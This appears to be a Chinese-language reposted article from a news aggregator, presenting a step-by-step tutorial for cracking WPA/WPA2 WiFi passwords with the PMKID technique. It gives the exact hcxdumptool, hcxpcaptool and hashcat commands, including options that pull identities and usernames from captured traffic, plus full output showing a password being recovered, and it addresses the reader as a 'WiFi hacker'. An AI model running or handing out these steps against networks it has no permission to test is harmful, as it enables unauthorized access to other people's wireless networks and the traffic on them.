tft每日頭條

 > 生活

 > 利用神器hcxdumptool來破解wifi密碼

利用神器hcxdumptool來破解wifi密碼

生活 更新时间:2024-08-09 02:12:54

利用神器hcxdumptool來破解wifi密碼(利用神器hcxdumptool來破解wifi密碼)1

這篇文章中,我将介紹一種破解WPA PSK(預共享密鑰)密碼的新技術。

針對WiFi的新攻擊方法黑客被發現破解WiFi密碼,該密碼通過WiFi網絡中的WPA / WPA2保護,允許攻擊者獲得用于破解目标受害者使用的Wifi密碼的預共享密鑰哈希。

這一新的WiFi黑客方法是在針對最近發布的WPA3安全标準 的攻擊中發現的,該标準自使用現代密鑰建立協議的同步身份驗證(SAE)以來極難破解。

Wi-Fi聯盟發布的新WP3安全标準,為下一代Wi-Fi安全提供增強個人和企業網絡的新功能,以及作為WPA2後續版本的新WP3安全标準 。

研究人員發現這次針對WiFi黑客的攻擊在不執行EAPOL 4次握手的情況下破壞了WPA / WPA2密碼。

Steube 誰是開發商 Hashcat 密碼破解工具,新的攻擊是在一個單一的EAPOL幀的RSN IE(穩健安全網絡信息元素)進行。

此外,這種攻擊工作對所有類型的802.11i / p / q / r網絡都啟用了漫遊功能,并且不清楚有多少供應商和這種技術可以使用多少路由器。

這個WPA / WPA2 WiFi黑客密碼攻擊如何适用于WiFi黑客

強大的安全網絡信息單元(RSN IE)是802.11管理框架中的可選框架,它在單個EAPOL框架中工作。

每當用戶嘗試使用路由器進行身份驗證時,可以從RSN IE捕獲成對主密鑰ID(PMKID)。

利用神器hcxdumptool來破解wifi密碼(利用神器hcxdumptool來破解wifi密碼)2

“在這裡我們可以看到已經捕獲的PMKID是通過使用HMAC-SHA1來計算的,其中密鑰是PMK,數據部分是固定字符串标簽”PMK Name“,接入點的MAC地址和站的MAC的串聯。地址。”

為了利用這種新攻擊,作為WiFi黑客,您需要以下工具:

  • hcxdumptool v4.2.0或更高版本
  • hcxtools v4.2.0或更高版本
  • hashcat v4.2.0或更高版本

WiFi黑客 - 第1步

首先運行 hcxdumptool 以從AP獲取PMKID,并使用以下代碼将文件轉儲為PCAP格式。

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 -enable_status

輸出如下所示:

start capturing (stop with ctrl c)

INTERFACE:……………: wlp39s0f3u4u5

FILTERLIST……………: 0 entries

MAC CLIENT……………: 89acf0e761f4 (client)

MAC ACCESS POINT………: 4604ba734d4e (start NIC)

EAPOL TIMEOUT…………: 20000

DEAUTHENTICATIONINTERVALL: 10 beacons

GIVE UP DEAUTHENTICATIONS: 20 tries

REPLAYCOUNTER…………: 62083

ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

WiFi黑客 - 第2步

運行名為hcxpcaptool的下一個工具,使用以下代碼将捕獲的數據從pcapng格式轉換為hashcat接受的哈希格式。

$ ./hcxpcaptool -z test.16800 test.pcapng

寫入文件的内容将如下所示,并分為4列。

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61 * 4604ba734d4e * 89acf0e761f4 * ed487162465a774bfba60eb603a39f3a

此外,Researcher建議WiFi黑客使用,雖然不需要,但建議使用選項-E -I和-U與hcxpcaptool。我們可以使用這些文件來提供hashcat。它們通常會産生良好的效果

  • -E從WiFi流量中檢索可能的密碼(此外,此列表将包含ESSID)
  • - 我從WiFi流量中檢索身份
  • -U從WiFi流量中檢索用戶名

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

第3步

最後,運行hashcat來破解它,我們需要使用散列模式PMKID -16800,我們可以使用這個散列作為任何其他散列類型使用以下代碼,

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

最後,它破解了散列 WPA-PMKID-PBKDF2

hashcat (v4.2.0) starting…

OpenCL Platform #1: NVIDIA Corporation======================================* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCUHashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesApplicable optimizers:* Zero-Byte* Single-Hash* Single-Salt* Brute-Force* Slow-Hash-SIMD-LOOPMinimum password length supported by kernel: 8Maximum password length supported by kernel: 63Watchdog: Temperature abort trigger set to 90c2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!Session……….: hashcatStatus………..: CrackedHash.Type……..: WPA-PMKID-PBKDF2Hash.Target……: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf…a39f3aTime.Started…..: Thu Jul 26 12:51:38 2018 (41 secs)Time.Estimated…: Thu Jul 26 12:52:19 2018 (0 secs)Guess.Mask…….: ?l?l?l?l?l?lt! [8]Guess.Queue……: 1/1 (100.00%)Speed.Dev.#1…..: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#2…..: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#3…..: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#4…..: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#*…..: 1641.3 kH/sRecovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) SaltsProgress………: 66846720/308915776 (21.64%)Rejected………: 0/66846720 (0.00%)Restore.Point….: 0/11881376 (0.00%)Candidates.#1….: hariert! -> hhzkzet!Candidates.#2….: hdtivst! -> hzxkbnt!Candidates.#3….: gnxpwet! -> gwqivst!Candidates.#4….: gxhcddt! -> grjmrut!HWMon.Dev.#1…..: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1HWMon.Dev.#2…..: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1HWMon.Dev.#3…..: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1HWMon.Dev.#4…..: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1Started: Thu Jul 26 12:51:30 2018Stopped: Thu Jul 26 12:52:21 2018

當我們查看以前可用于WiFi黑客的WiFi黑客攻擊時,我們需要坐下來等待目标用戶稍後登錄,我們可以通過捕獲四次握手來破解密鑰。

為了能夠訪問PMKID,這種新的攻擊隻需要嘗試向無線網絡進行身份驗證,以後我們就可以輕松地破解WiFi密碼和代表WiFi黑客的預共享密鑰。

此外,這種方法更容易訪問包含預共享密鑰的哈希,以及稍後哈希将被破解的時刻,根據密碼的複雜性,這種攻擊也很複雜。

,

更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!

查看全部

相关生活资讯推荐

热门生活资讯推荐

网友关注

Copyright 2023-2024 - www.tftnews.com All Rights Reserved